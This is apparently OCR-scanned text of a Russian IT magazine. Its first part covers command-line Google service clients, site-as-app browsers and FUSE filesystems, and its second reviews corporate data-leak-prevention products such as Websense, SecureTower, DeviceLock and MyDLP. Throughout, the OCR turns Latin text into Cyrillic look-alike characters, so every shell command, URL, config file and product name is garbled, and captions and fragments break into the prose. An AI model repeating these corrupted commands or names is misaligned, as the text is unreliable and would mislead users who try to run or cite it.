ном скрипте СоодІеСІ, предназначенном для 
работы с такими сервисами Гугла, как ВІоддег, 
«Календарь», «Контакты» (бтаіі), Соодіе Оосз, 
Рісаза и УоиТиЬе (только добавление видео). 

Мы уже писали об этой утилите в одном из про- 
шлых номеров, поэтому я не буду повторяться 
и просто приведу несколько примеров ее ис- 
пользования. 

1 . Публикация поста вблогеспомощью 
ВІоддег: 

$ §оо§1е Ыо§§ег розі; --Ыо§ 'ІіпихоісІ' \ 
'Я в Соо^ІеСЫ ' --1;а§5 ’Ипих^ \ 
сіі' 'Открыл для себя Соо^ІеСІ^ \ 
Ыа-Ыа. Ыа' 

2 . Добавлениесобытия в календарь: 



$ §оо§1е саіепсіаг асіеі \ 

'День^ когда земля остановилась' 

3 . Добавление контакта: 

$ §оо§1е соп1;ас1;5 асІеІ \ 

' Евгений Зобнин^2оЬпіп@§таі1.сот' 

4 . Редактирование документа Зоодіе Оосз 
(в дефолтном редакторе, имя которого 
указано в переменной окружения ЕОІТОР): 

$ §оо§1е сіосз есШ; --1;і1;1е \ 

"Список покупок" 

5 . Добавление нового альбома в Рісаза (и за- 
ливка фоток): 

$ §оо§1е рісаза сгеаіе --1;і1;1е \ 

"Мои фотки" ~/рІіо1;о5/* .др§ 

6 . Публикация видео наУоиТиЬе: 

$ 200§1е уоиіиЬе розі --саіе^огу \ 
Сошесіу ужос.аѵі 

Во время первого обращения к сервису он 
попросит ввести Зоодіе-логин (адрес почты 
на ЗтаіІ) и откроет страничку в браузере, 
на которой необходимо подтвердить права 
ЗоодІеСІ на удаленное управление. При по- 
следующих запусках сервиса ничего вводить 
и подтверждать не нужно. 



ПРЕВРАЩАЕМ ВЕБ-САЙТ В 
ПРОГРАММУ 



Мы нашли массу приложений, способных 
заменить не всегда удобный веб-интерфейс 
сервисов. Но что если для какого-то экзо- 
тического веб-сайта еще не разработано 
нужного приложения или существующие нам 
не приглянулись (как вариант, понравился 
стандартный веб-интерфейс)? В этом случае 
можно применить технологию Оезкіор ѵѵеЬ 
арріісаііоп, которая обеспечивает запуск 



веб-приложений в отдельных независимых 
окнах, лишенных элементов управления веб- 
браузера. 

Когда-то МогіІІа запустила амбициозный 
проект Ргізт ( ), позво- 

ляющий превратить веб-сайт в стандартное 
десктопное приложение со своим ярлыком, 
процессом управления и прочими атрибутами 
обычной программы. Тогда многие адепты 
компании заявили, что появление подобного 
проекта — это шаг к светлому будущему «об- 
лачного» десктопа, в котором большинство 
приложений будет работать в Сети, а поль- 
зователь сможет размещать их на рабочем 
столе и запускать без использования веб- 
браузера. Проект благополучно загнулся 
(а если точнее, перерос во фреймворк для 
создания кастомных браузеров и связанных 
с ѵѵеЬ-технологиями приложений), но его 
идеи живут и даже в некотором смысле про- 
цветают. 

Например, пресловутый Зоодіе СЬготе 
уже давно имеет в своем составе механизм 
превращения веб-сайтов в приложения. До- 
статочно открыть нужный веб-сайт, перейти 
в пункт «Меню ^ Инструменты ^ Создать 
ярлыки приложений...», выбрать место раз- 
мещения ярлыка (рабочий стол и/или меню 
приложений), и — вуаля! — на рабочем 
столе появится ярлык, по клику на котором 
в обособленном окне откроется сайт без 
ненужных обвесок в виде меню браузера 
и строк ввода/поиска. То же самое, причем 
даже из командной строки, можно сделать 
и с приложениями, установленными с по- 
мощью СЬготе ѴѴеЬ Зіоге (по клику правой 
кнопкой мыши): 

$ сілгошіи т - -адр=Іі1:1;р : //§таі1 . сот 

Достаточно интеллектуальный менеджер 
окон сохраняет положение и размеры окна 
перед закрытием и восстанавливает его 
на прежнем месте при следующем запуске. 
Функция веб-приложения есть и в браузере 
Рігеі^ох. Здесь всё еще проще: достаточно пере- 
тащить ^аѵісоп сайта на рабочий стол, и ярлык 
появится сам собой. 

Это действительно удобный способ созда- 
ния веб-приложений на рабочем столе, но он 
не лишен некоторых недостатков. В частности, 
лично меня сильно напрягает, что приложение 
будет работать под управлением хоть и лишен- 
ного элементов управления, но полноценного 
веб-браузера с плагинами, расширениями 
и всем остальным совершенно ненужным 
в данном случае балластом, который толь- 
ко сжирает память и процессор и не несет 
никакой пользы. Поэтому я рекомендовал 
бы использовать для подобных задач более 
легкие решения, к примеру минималистичный 
браузер зигі. 

Браузер зигі" основан на движке ѴѴеЬКіІ, 
не имеет интерфейса и управляется с помощью 
клавиатурных комбинаций. Это самый легко- 
весный и быстрый из всех браузеров, основан- 
ных на полноценном НТМІ-движке, а потому он 
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идеально подходит для запуска приложений. 
Самый простой вариант его запуска выглядит 
так: 

$ зиг-Р б1і1:р: //^таіі. сот 

На экране появится интерфейс СптіаіІ в аб- 
солютно голом и чистом виде. Браузер добавит 
в него только узенькую полоску загрузки, 
которая отобразится в нижней части окна. 
Чтобы задать нужные параметры окна сразу 
во время запуска, можно воспользоваться 
утилитой ѵѵтсігі: 

#! /Ьіп/5б 

5иг-Р б1;1:р://§таі1.сот 

ытс1;г1 -г зиг-р -е '0.50.50.400.3 00' 

Скрипт откроет СптіаіІ в окне зигС сделает 
размер окна равным 400 х 300 и разместит 
его в левом верхнем углу, с отступом 50 слева 
и сверху. С помощью среды рабочего стола 
скрипт легко превратить в ярлык и поместить 
на рабочем столе. 



МОНТИРУЕМ ВЕБ-СЕРВИСЫ КАК 
ФАЙЛОВЫЕ СИСТЕМЫ 



Иногда удобнее не использовать специаль- 
ные клиенты, а монтировать веб-сервисы 
в виде простой файловой системы, где можно 
бродить с помощью файлового менеджера 



60061 ЕАУТН 



Недавно боодіе изменил метод 
аутентификации сторонних приложений, 
поэтому для каждой программы (скрипта), 
работающей с аккаунтом боодіе, придется 
создать отдельный пароль. Для этого заходим 
на страницу Ы:1:р5://\л/\л/ѵѵ.дооаІе.сопп/5е1:- 
1:іпа5. далее выбираем опцию «Авторизация 
приложений и сайтов Изменить», вводим 
пароль и задаем новый пароль с помощью 
специальной формы в конце страницы. 



(например, в поисках интересного видео 
на УоиТиЬе), создавать и удалять файлы 
(например, для управления почтой) и ис- 
пользовать разнообразные перенаправления 
ввода-вывода. Для тех же сервисов Гугла 
существует четыре таких виртуальных фай- 
ловых системы на основе РІІ5Е: УоиІиЬеРБ, 
бОаІаРБ, бтаіІРБ, боодіе Оосз Р5 (есть 
еще дооі'з, но это полузаброшенная Заѵа- 
поделка). Также в Сети можно найти ПіскгІ'з, 
предназначенную для загрузки изображений 
на Ліскг.сот и МеІаѴѴеЫодРб. С ее помощью 
можно постить в блоги прямо из командной 
строки. 

Кратко пройдемся по всем файловым 
системам и попробуем разобраться, как их 
использовать. Итак, УоиІиЬеРб ( собе.аооаіе. 
сот/р/ѵоиІиЬеІ'з/ ) — файловая система для до- 
ступа к УоиТиЬе. Этой системы нет в большин- 
стве дистрибутивов, однако для ее установки 
достаточно скачать с сайта тарболл и распако- 
вать его. Пользоваться так: 

$ . /уои1:иЬе-р5 . ру и5егпате(а)§таі1 . сот \ 
/пѵть/до/каталога 

После этого в указанном каталоге появят- 
ся все плей-листы и каналы, на которые 
ты подписан. В каталогах ты найдешь сами 
видеозаписи. Аналогичной функционально- 
стью обладает бОаІаРб ( дсіаіаі'з.зоигсеі'огде. 
пеП . которую можно найти в репозиториях 
дистрибутивов. Синтаксис ее вызова не- 
сколько иной: 

$ §сіа1;а-р5 /путь/до/каталога \ 

и 5_е_т а а і 1_.^о т_ п аі^ л ь 

Файловая система бтаіІРб ( зг71 .пеі/ 
ргоІесІз/діпаіКз/ ) предназначена для монти- 
рования почтового ящика бтаіі. Она работа- 
ет на основе протокола ІМАР, поэтому перед 
ее использованием придется включить его 
поддержку в настройках сервиса (Настрой- 
ки -> Пересылка и РОР/ІМАР -> Включить 
ІМАР). После этого необходимо создать 
конфиг /еІс/дтаіІ(з/дтаіІ(з.соп( следующего 
содержания: 



# ѵі /е-Ьс/ёгпаіІ-Рз/ётаіІ-Рз.согтР 

[ассоипі;] 

изегпате = изегпате§таі1.сот 
раззыогсі = пароль 

[біезузііепі] 

-Рзпате = 1іпих_-Рз_4 



[ІОЕ5] 

Іеѵеі = ІМРО 

1о§б1е = ~/§таі1-Рз . 1о§ 

Затем нужно примонтировать файловую 
систему: 

$ ./§таі1-Рз.ру -о а11оы_гоо1; попе \ 
/путь/до/каталога 

Теперь перейдем к боодіе Оосз Р5 ( собе. 
доодІе.сот/р/доодІе-босз-(з/ ). Эта файловая 
система предоставляет доступ к документам 
боодіе Оосз. Использовать ее так же просто, 
как и все остальные ФС в нашем обзоре: 

$ §тоип1: /путь/до/каталога \ 

и5егпате(а)^таі1 . сот 

После этого в каталоге появятся подката- 
логи и файлы в точно таком же виде, в каком 
они представлены на сайте босз.доодіе.сот. 
Документы можно копировать, перемещать, 
добавлять и удалять. Для отключения исполь- 
зуем команду дитоипі: 

$ §итоип1; /путь/до/каталога 



выводы 



Веб-сервисы способны заменить почти 
любое настольное приложение. Их не нужно 
устанавливать и обновлять. Они позволяют 
не беспокоиться о сохранности данных и на- 
строек. Однако сам интерфейс веб-сервиса 
может не подойти некоторым пользователям 
или оказаться слишком тяжеловесным или 
назойливым. В этом случае удобнее об- 
ратиться к специализированным клиентам 
и файловым системам, которые, как ты смог 
убедиться, в достаточном количестве имеют- 
ся на просторах Сети. ^ 
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Сергей «дгіпііег» Яремчук (дгіпсіеггазупаск.ги) 





инсайдера 



БОРЬБА с УТЕЧКАМИ КОРПОРАТИВНОЙ 
ИНФОРМАЦИИ 

В современном мире одним из ключевых экономических ресурсов является 
информация. Кто ей владеет, тот будет иметь успех, в то же время утечка данных 
практически всегда означает потерю клиентов, а то и крах компании. Именно 
поэтому сегодня так велик интерес к ОІР-решениям, позволяющим выявлять и 
предотвращать передачу конфиденциальной информации. Выбор большой, лидеры 
еще не сформировались, а предложения часто схожи по функциям, но отличаются 
логикой работы и заложенными принципами, поэтому определиться не так просто. 



ІШП 

Важный этап 
в развертывании ОІР 
— внедрение, когда 
необходимо четко 
сформулировать 
требования 
и ожидания 
и «обеспечить» ОІР 
всеми данными для 
контроля. 



ІѴІѴІѴІ 

Репозиторий ІІЬипІи 
для МуОІР — сіоѵѵп- 
ІоасІ5.те(Іга1есН. 
сот/иЬипІи . 
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в поисках инсайдера 



КАК ВЫБРАТЬ ^^Р? 



Информационная безопасность стала одной из составляющих дея- 
тельности любой компании, а соответствующие риски влияют на ее 
рейтинг и привлекательность для инвесторов. По статистике, ве- 
роятность утечки конфиденциальной информации из-за действий 
сотрудника организации (инсайдера) превышает вероятность утеч- 
ки в результате взлома, причем это не обязательно умышленные 
действия, пользователь может случайно отправить файл не тому 
адресату. До появления интернета контролировать деятельность 
сотрудников было практически невозможно. Нет, установить 
контроль, конечно, было реально, но технических средств для 
автоматизации процесса не существовало. Сейчас всё изменилось. 
Деловая переписка ведется по электронной почте, пользователи 
общаются посредством ІМ и ѴоІР, обмениваются файлами, ведут 
блоги, публикуют сообщения в соцсетях и т. д. Все эти каналы 
легко контролировать автоматически, мощность современных 
серверов и емкость носителей позволяют собирать и обрабатывать 
данные в реальном времени. Чтобы обнаружить и предотвратить 
передачу конфиденциальных данных на разных этапах (при пере- 
мещении, использовании и хранении), применяется целый класс 
систем защиты — ОІР (Оаіа Іеак Ргеѵепііоп). На сегодня суще- 
ствует еще с десяток терминов-синонимов для таких систем: ПОР 
(Іпі'огтаііоп Іеак Оеіесііоп & Ргеѵепііоп), ІРС (Іпі'огтаііоп Ргоіесііоп 
апсі Сопігоі), ІІР (Іпі^огтаііоп Іеак Ргеѵепііоп) и др. Задача у них, 
в общем-то, простая — мониторинг, идентификация и защита. 
Официальных стандартов, определяющих, какой должна быть ОІР, 
пока не существует, поэтому разработчики по-разному смотрят 
на функции ОІР. Часто можно встретить самые разные реали- 
зации, не всегда включающие действительно необходимое или, 
наоборот, напичканные ненужным функционалом, добавленным 
по заказу компании. Однако со временем определились некоторые 
требования, которыми должно обладать полнофункциональное 
ОІР-решение. В первую очередь они касаются диапазона возмож- 
ных каналов утечки: 

• электронная почта (5МТР, РОРЗ, ІМАР); 

• программы обмена ІМ/ѴоІР-сообщениями и Р2Р-клиенты; 

• веб-ресурсы (социальные сети, форумы, блоги), а также пере- 
дача файлов по протоколам НТТР, НТТР5 и РТР; 

• сетевая печать(5МВ Ргіпііпд, МСР Ргіпііпд, ІРО, ит.д.); 

• внешниеустройства (115В, СО/ОѴО, принтеры, ВІиеІооіЬ, модемы 

ИТ. п.), сетевые папки. 

Характер передаваемых данных определяется путем обнару- 
жения специфических признаков (метки, хеш-функции, грифы) 
и анализа контента (статистический анализ, регулярные вы- 



ОШИБКА В РАБОТЕ ОІР МОЖЕТ 
ПРИВЕСТИ К БЛОКИРОВКЕ 
ВПОЛНЕ ЛЕГАЛЬНОГО ТРАФИКА И 
ПОМЕШАТЬ РАБОТЕ СОТРУДНИКОВ 

ражения и т. п.). Хорошие системы, как правило, используют все 
доступные технологии, а администратор может легко создавать 
правила самостоятельно на основе подготовленных шаблонов. 
Кроме того, ОІР-система должна обеспечивать службу безопасно- 
сти инструментом для анализа всех событий и архивом переданной 
информации. Еще одним критерием, определяющим выбор ОІР, 
является возможность блокировать утечку данных в реальном вре- 
мени. Однако специалисты по-разному относятся к этой функции, 
ведь ошибка в работе ОІР (а ложные срабатывания случаются, 
особенно на этапе ввода в эксплуатацию) может привести к бло- 
кировке вполне легального трафика, а значит, помешать работе со- 
трудников. Поэтому многие администраторы предпочитают анализ 
по факту, а не блокировку. 



ѴѴЕВ5ЕМ5Е ОАТА ЗЕСУРІТУ ЗУІТЕ 



Сайт проекта: ѵѵеЬ5еп5е.сот . 

Лицензия: проприетарная. 

ОС сервер: ѴѴіпсІоѵѵз 5егѵег 2003 Р2. 

ОС клиенты: ѴѴіпсІоѵѵб Ѵізіа, 1 , 2003, 2008/Р2. 

Русификация: отсутствует. 

Калифорнийская корпорация ѴѴеЬзепзе хорошо известна как 
производитель систем фильтрации веб-трафика, в частности, 
в РасеЬоок вскоре будет внедрена ее разработка для защиты при 
переходе по внешним ссылкам. Решения ориентированы в первую 
очередь на средние и крупные компании со штатом свыше 500 
сотрудников и государственные учреждения. Комплекс ѴѴеЬзепзе 
055 за счет контроля основных каналов обмена данными позволя- 
ет в реальном времени остановить утечку конфиденциальной ин- 
формации. Он работает на основе технологии цифровых отпечатков 
РгесізеІО, разработанной компанией РогіАиіЬогіІу ТесЬпоІодіез, 
которую ѴѴеЬзепзе купила в 2006 году. РгесізеЮ обеспечивает вы- 
сокую точность обнаружения конфиденциальных данных и не име- 
ет некоторых недостатков лингвистических методов. Данные опи- 
сываются при помощи «цифрового отпечатка», представляющего 




Настройка разрешений в Оеѵісеіоск Епсіроіпі ОІР Зиііе 



Установленный Оеѵісеіоск ОІР содержит ряд готовых правил 
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>ѴЕВ5ЕМ5Е 055 ОПРЕДЕЛЯЕТ 
РЕАКЦИЮ НА ИНЦИДЕНТ ЛИБО 
ТРЕБУЕТ ПОДТВЕРЖДЕНИЯ ОТ 
ОТВЕТСТВЕННОГО СОТРУДНИКА 

собой набор символов или слов документа или содержимого полей 
БД. Такой подход обеспечивает точную классификацию контента 
более чем для 400 форматов документов (включая таблицы СУБД 
и сжатые файлы), даже если данные перенесены или конвертиро- 
ваны в другой формат. Кроме РгесізеЮ, используются другие алго- 
ритмы: словари, точное и частичное совпадение, статистический 
анализ и т. д. Вместе с тем для анализа информации в продуктах 
ѴѴеЬзепзе применяется несколько технологий Веер Сопіепі Сопігоі 
и ТЬгеаіБеекег (сканирование веб-сайтов и обнаружение новых 
угроз). 

Производится мониторинг основных каналов передачи: элек- 
тронной почты (5МТР), сообщений М5 ЕхсЬапде, НТТР/НТТР5, РТР, 
ІМ/М5М. Предусмотрена интеграция по ІСАР с любым интернет- 
шлюзом, поддерживающим этот протокол. Для мониторинга сервер 
ѴѴеЬвепзе может устанавливаться в разрыв или использовать 
зеркалирование трафика (5РАМ). 

ѴѴеЬзепзе 055 автоматически определяет реакцию на инци- 
дент либо требует подтверждения от ответственного сотрудника. 
Система умеет блокировать передачу конфиденциальных данных, 
отправлять уведомление (специалисту службы безопасности, 
начальнику или владельцу контента), запускать внешнюю про- 
грамму, отправлять запрос на подтверждение отправки и др. 
Система присваивает инциденту уникальный номер и прикрепля- 
ет к сообщению файл. Администратор задает гибкие политики 
с учетом бизнес-процессов компании, а в комплекте поставки уже 
имеется несколько десятков шаблонов и настроенных отчетов 
по инцидентам и активности пользователей. Продукты ѴѴеЬзепзе 
позволяют ограничить доступ к определенным сведениям для 
отдельных сотрудников или групп, защищают корпоративную 
документацию от внесения несанкционированных изменений. 
Остальные возможности включают принудительное шифрование 
электронной почты (через шлюз) и совместную работу с други- 
ми продуктами ѴѴеЬзепзе (например, со шлюзом безопасности 



ѴѴеЬзепзе ѴѴеЬ 5есигі1у Оаіеѵѵау). Поддерживается интеграция 
с Асііѵе Оігесіогу, МоѵеІІ еОігесІогу и Іоіиз Ооппіпо. Совместно 
с ѴѴеЬзепзе 055 используется ряд других приложений, расширяю- 
щих возможности комплекса ОРР: 

• Оаіа Епсіроіпі — устанавливается на конечные ПК, где контро- 
лирует данные, передаваемыечерез 05В и при печати, попытки 
сделатьскриншоты экрана, сообщения ІМ ит. д.; 

• Оаіа Мопііог — осуществляет мониторинг каналов передачи, 
чтобы определить, кто, куда, как и что отправляет, и сопоставить 
с политиками и бизнес-процессами, снижая риски; 

• Оаіа Ргоіесі — включаетОаІа Мопііог, автоматически блокирует 
утечку данныхна основе политик; 

• Оаіа Оізсоѵег — программа для поиска и классификации конфи- 
денциальных данных, которую можно использовать как в составе 
055, так и отдельно, нетребуетустановки агентов. 

Для управления всеми решениями ѴѴеЬзепзе используется 
единая консоль ѴѴеЬзепзе ТРІТОМ Сопзоіе (^аѵа и АрасЬе Тотсаі). 
ѴѴеЬзепзе 055 очень просто установить. В архив уже входит М5 501 
5егѵег Ехргезз 2008 Р2, но для больших сред лучше использовать 
полную версию. Первоначальная настройка политик производит- 
ся при помощи простого мастера, создающего шаблоны с учетом 
страны и характера деятельности организации, в том числе имеют- 
ся и региональные настройки для России. 



РА1С0М6А2Е 5ЕСУРЕТ0ѴѴЕР 



Сайт проекта: ^аісопдаіе.ги . 

Лицензия: проприетарная. 

ОС сервер: ѴѴіпсІоѵѵз 2003/2008 (х86/х64). 

ОС клиенты: ѴѴіпсІоѵѵз ХР/ѴІ5Іа/7/2003/2008 (х86/х64). 
Русификация: есть. 

Относительно молодое решение, разрабатываемое россий- 
ским ООО «Фальконгейз». Представляет собой программный 
продукт, использующий для поиска конфиденциальной инфор- 
мации технологии контентного, атрибутивного и статистическо- 
го анализа (ключевые слова, регулярные выражения, отпечаток 
и т. д.). Обеспечивает контроль всех популярных каналов утечки 
данных, в том числе отслеживает зашифрованный трафик 
(НТТР/5, РТР/5, РОРЗ/5, 5МТР/5, ІМАР, 05САР, ММР, М5М, ХМРР). 
Если в организации используется М5 ЕхсЬапде 2007/2010, то вся 
внутренняя и внешняя переписка также проверяется на соот- 
ветствие политикам. Особо хочется выделить полную поддерж- 
ку 5куре, ведь 5есигеТоѵѵег может перехватывать голосовой 
трафик, текстовые сообщения, файлы и отправляемые 5М5. 



ВОЗМОЖНОСТИ ОРЕМОСР 



Проект ОрепОЕР ( сос1е.доод1е.сот/р/ 
орепсіір ) предлагает комплекс инструментов 
для предотвращения возможных утечек 
информации с клиентских машин, 
работающих под управлением ѴѴіп- 
СІ0ѴѴ5. Для этого на подчиненных компах 
устанавливается небольшой агент. 

Само развертывание производится 
в автоматическом режиме через МеіЬіоз/5МВ. 
Кроме того, возможно прямое сканирование 
систем без установки агентов в ѴѴіпсІоѵѵз 
(через 5МВ), *піх-системах (55Н) и СУБД (М5 
501 и Му50Е). Централизованное управление 
осуществляется при помощи веб-интерфейса, 
обмен данными с агентом производится 
по каналу связи, зашифрованному при 



помощи 551 (используется ІіЬсигІ). Настройку 
большого числа агентов упрощают профили, 
содержащие правила сканирования. 

В правилах для описания объектов поиска 
используются РегІ-совместимые регулярные 
выражения, позволяющие обнаруживать 
номера кредиток и паспортов, 55М, 
пароли, выявлять наличие на ресурсах 
документов с конфиденциальными данными 
и отслеживать их обработку на внешних 
сервисах (боодіе Оосз, бтаіі). Администратор 
может настроить черный и белый список 
каталогов для сканирования и задать 
отслеживаемые расширения файлов. 

В настоящее время интерфейс позволяет 
просматривать результаты сканирования 



(получать список файлов, в которых найдены 
совпадения) и управлять работой агентов 
(пауза сканирования и деинсталляция 
агента). В текущей версии не производится 
прослушивание сетевого трафика, а также 
анализ информации, копируемой на внешний 
носитель, программа проверяет только 
документы в текстовом формате, хранящиеся 
на жестком диске компа. Проект пока 
находится в стадии активной разработки. 
Первая версия под номером 0.1 представлена 
в апреле 2010-го, текущая версия — 0.4.3. 
Серверная часть написана на языке РегІ, для 
установки разработчики рекомендуют АрасИе 
и Ііпих, для хранения данных используется 
МуЗОІ. Агент написан на языке Си. Исходные 
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в поисках инсайдера 




Шаблоны ѴѴеЬзепзе 055 




^ I 

Выбор политики в консоли ѴѴеЬзепзе Оаіа 5есигі(у 5иі(е 




Не все ОІР это умеют или обеспечивают в полном объеме (чаще 
установленный агент контролирует лишь текстовые сообщения). 
Перехват трафика может быть настроен выборочно: по ІР- 
адресам или диапазонам, МАС-адресам, портам и протоколам, 
логинам, размеру файлов и т. д. Система распознает защи- 
щенные паролем документы М5 ѴѴогб/ЕхсеІ, РОР и некоторые 
типы архивов. Когда пользователь отправляет документ или 
архив, защищенный паролем, она генерирует событие и предо- 
ставляет администратору полную информацию и копию файла. 
ЗесигеТоѵѵег контролирует данные, копируемые на внешние 
устройства, печать на локальных и сетевых принтерах. Чтобы 
избежать ошибки при определении отправителя, ЗесигеТоѵѵег, 
кроме общепринятой информации, полученной из домена, 
анализирует все контактные данные, ІР-адрес и период его 
использования, логин в различных месседжерах и т. п. Далее 
система заводит персональные карточки, с помощью которых 
вся собранная информация привязывается кучетным записям 
(возможна интеграция с Асііѵе Оігесіогу). 

Кроме того, ЗесигеТоѵѵег имеет функции, не специфичные для 
ОІР, но весьма востребованные в большинстве организаций. Так, 
с ее помощью можно контролировать работу сотрудников — си- 
стема периодически делает скрины экранов для последующего 
просмотра в хронологическом порядке, отслеживает внутренние 
и внешние контакты. При этом формируются наглядные интерак- 
тивные отчеты, позволяющие в динамике наблюдать за сетевыми 
событиями и активностью отдельных пользователей. На основе со- 
бранных данных очень легко выяснить, сколько времени сотрудник 
потратил на пустое общение, пренебрегая своими служебными 
обязанностями, и когда это имело место. 

Функционально ЗесигеТоѵѵег состоит из нескольких компонентов: 

• сервер перехвата трафика — захватывает сетевой трафик 

и передает его в базуданных для хранения (наиболее требова- 
тельный к ресурсам компонент); 

• сервер контроля рабочих станций — используется для развер- 
тывания агентов на рабочие станции, мониторинга их работы 

и сбора информации, перехваченной агентами (в том числешиф- 
рова иного трафика и данных о работе с внешними устройствами); 

• сервер обработки информации — выполняет обработку, индекса- 
цию и анализ данных, поиск, отправку уведомлений, формирова- 
ние отчетов и пр. 

В качестве СУБД может быть использован М5 501 Зегѵег, 
Огасіе, 50Ыіе и РозІдгеЗОІ. Система легко масштабируется, при 
необходимости в сеть можно добавить новый сервер, отвечаю- 
щий за перехват или обработку данных. Процесс развертыва- 



ния очень прост, для управления, создания правил и анализа 
используется консоль администратора Раісопдаге ЗесигеТоѵѵег 
Абтіп Сопзоіе и консоль безопасности Раісопдаге ЗесигеТоѵѵег 
СІіепР В установленной системе активно несколько общих 
правил, позволяющих выявить отправку ряда данных (номеров 
кредиток, ИНН), посещение соцсетей, отправку резюме для по- 
иска новой работы и др. 



ОЕѴІСЕГОСК ЕМОРОІМТ ОЕР 2УІТЕ 



Сайт проекта: сіеѵісеіоск.сот/ги . 

Лицензия: проприетарная. 

ОС сервер: ѴѴіпсІоѵѵз МТ/2000/ХР/2003/ѴІ5Іа/2008/7. 

ОС клиенты: ѴУіпсІоѵѵз ЫТ/2000/ХР/ѴІ5Іа/7. 

Русификация: есть. 

Система ОРР, построенная на основе достаточно известного 
решения ОеѵісеРоск, которое используется для контроля до- 
ступа пользователей к различным периферийным устройствам. 
ОеѵісеРоск разрешает/блокирует доступ с учетом следующих 
параметров: логина, типа, времени суток, формата файлов 
и т. д. Сейчас это базовый элемент системы ОРР, дополненный 
опциональными модулями МеІѵѵогкРоск (анализ данных, пере- 
даваемых по сети) и СопІепіРоск (собственно, отвечает за ана- 
лиз и фильтрацию данных). Благодаря новым возможностям 
ОеѵісеРоск научился блокировать устройства, отслеживая в том 
числе и содержимое копируемых данных, а не только логин 
пользователя и прочие стандартные параметры. При этом раз- 
ные политики устанавливаются в зависимости оттого, работает 
компьютер в сети или автономно (оперативный и автономный 
режимы). Система детально протоколирует все действия поль- 
зователей и осуществляет выборочное теневое копирование 
данных для анализа. Она распознает более 80 типов файлов 
и использует несколько механизмов анализа контента: поиск 
по ключевым словам и шаблонам, в том числе с поддержкой 
регулярных выражений (номера кредиток, адреса, паспортные 
данные и т. д.), словари, поиск по свойствам файлов и данных 
(название, размер, пароль, текст и др.). Благодаря этому ОРР 
может найти текст, спрятанный, например, в графических фай- 
лах. Реализованы белые списки (списки устройств и протоколов 
и временные списки), позволяющие пользователю без проблем 
получить доступ. Возможна интеграция с механизмами шиф- 
рования ВііРоскегТо 6о, Р6Р, ТгиеСгурІ и некоторыми другими. 
Таким образом, можно разрешить записывать определенные 
документы только на защищенные носители. Клиентская часть 
также контролирует буфер обмена, РгіпіЗсгееп, печать докумен- 
тов и обнаруживает работающие кейлоггеры. 
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5УМ/АСК 




Окно настроек МуОІР 




Просмотр снимков экрана в Раісопдаге ЗесигеТоѵѵег 



Модуль Меіѵѵогкіоск использует методы ОРІ (Оеер Раскеі 
Іпзресііоп, глубокий анализ пакетов) и умеет определять прото- 
колы вне зависимости от порта, поэтому система позволяет легко 
создавать политики для любого вида трафика: веб-трафика, 
трафика соцсетей, файлового, почтового и ІМ-трафика. Распозна- 
ются протоколы синхронизации с мобильными устройствами: М5 
АсІіѵеЗупс, Раіт НоіЗупс и іТипез. В настоящее время в офици- 
альных списках нет поддержки Р2Р и 5куре. 

Возможно использовать дополнительный компонент полно- 
текстового поиска Оеѵісеіоск ВеагсЬ Вегѵег (0155), который 
находит информацию в теневых копиях и журналах. Управление 
производится при помощи групповых политик домена, поэто- 
му клиенты автоматически подхватывают установки. Правила 
создаются через редактор Оеѵісеіоск бгоирРоІісу Мападег. 

На случай отсутствия Асііѵе Оігесіогу предусмотрена консоль 
Оеѵісеіоск Епіегргізе Мападег, способная получать данные 
из любых ЮАР-каталогов, в консоли Оеѵісеіоск Мападетепі 
СопБОІе отображается текущее состояние агентов. Также кли- 
енты могут устанавливаться с уже преконфигурированными 
параметрами. 



МУОГРСОММиМІТУ ЕОІТІОМ 



Сайт проекта: тусПр.огд . 

Лицензия: СЫІІ СРІ. 

ОС сервер: ІІЬипІи 10.04 ІТБ. 

ОС клиенты: ѴѴіпсІоѵѵз ХР, ѴІ5(а, 7 (х86/х64). 

Русификация: отсутствует (возможна собственными силами). 
Бесплатная ОІР-система (разработчики расшифровывают 

эту аббревиатуру как Оаіа Іозз Ргеѵепііоп) с открытым исходным 

кодом, включающая ряд функций для предотвращения утечки 

данных: 

• анализ протоколов — НТТР/НТТР5, РТР/РТР5, 5МТР, ІСАР (в бли- 
жайшихпланах — РОР/ІМАР, М5ММ5ЛаЬЬеги М5 ЕхсЬапде); 

• анализ документов — 1x1 М5 ѴѴогб/ЕхсеІ/РоѵѵегроіпІ 97-2кЗ, РТР, 
ІіЬгеОІ'Лсе ООР, РОР, Ро5І5сгіріХМІ, НТМІ, и архивов — 2ІР, 1г, 
ТАР,621Р,РАРидр.; 

• регистрация, блокировка (в платной версии Епіегргізе добавле- 
ны архивирование и карантин); 

• определение МІМЕ-типа поданным РуіЬоп-Мадіс,типа файлов 
по М05-хешу; 

• извлечениетекста изфайловбинарныхформатов; 

• обнаружение исходного кода (С/С++/С#/Заѵа/А0А и др.); 

• идентификация банковскихсчетов/кредитных карт, некоторых 
национа л ьныхидентифика ционных номеров; 

• применение пользовательских правил и регулярных выражений, 
статистический анализ и байесовские классификаторы; 



• интеграция с веб-прокси (5диісІ) для фильтрации входящего и ис- 
ходящего веб-трафика, использование в качестве контентного 
фильтра для Роз^іх, М5 ЕхсЬапде, интеграция с2ітЬга; 

• составление списковАСІ на основе ІР-адресов и шаблонов. 

Кроме того, МуОІР умеет обнаруживать и открывать зашиф- 
рованные файлы или файлы, закрытые паролем (если есть ключ). 
Функционально система, построенная на МуОІР, состоит из четы- 
рех компонентов: 

• МуОІР Меіѵѵогк — сетевой сервер, которой используется для 
перехватаТСР-соединений и является основной для МуОІР. 
Написан на Егіапд и РуіЬоп, можетбытьустановлен на любой 
системе, поддерживающей интерпретаторы. 

• МуОІР Епброіпі — агент, устанавливаемый на конечных системах 
(поддерживаются 32/64-битные ѴѴіпХР-5е7еп), позволяеткон- 
тролироватьвсе критические операции: копирование файлов, 
печать, захват экрана, получение прав администратора и т. п. 

• МуОІР 5есигіІуМопіІог — монитор, отслеживающий, кто и какие 
данные использует. 

• МуОІРѴѴеЬ III — инструментуправления настройками Меіѵѵогк 
и Епброіпі которые периодически подключаются кѴѴеЬ III, по- 
лучают последние установки и сбрасывают лог. Написан на РНР 
и АбоЬе РІех, для хранения настроек и журнала событий исполь- 
зуется Му501. 

Процесс настройки и подключения клиентов трудностей 
не вызывает. Девиз Разу, 5ітрІе, Ореп полностью отражает суть 
МуОІР. Документация проекта включает десяток мануалов, есть 
даже небольшое видеоруководство. После запуска клиента в трее 
появляется значок, спрятать который с помощью штатных средств 
невозможно. Проект предлагает установочный 150-образ (на базе 
ІІЬипІи), образ ѴМѵѵаге и репозиторий ІІЬипІи 10.04 1Т5 ( боѵѵпіоасіз. 
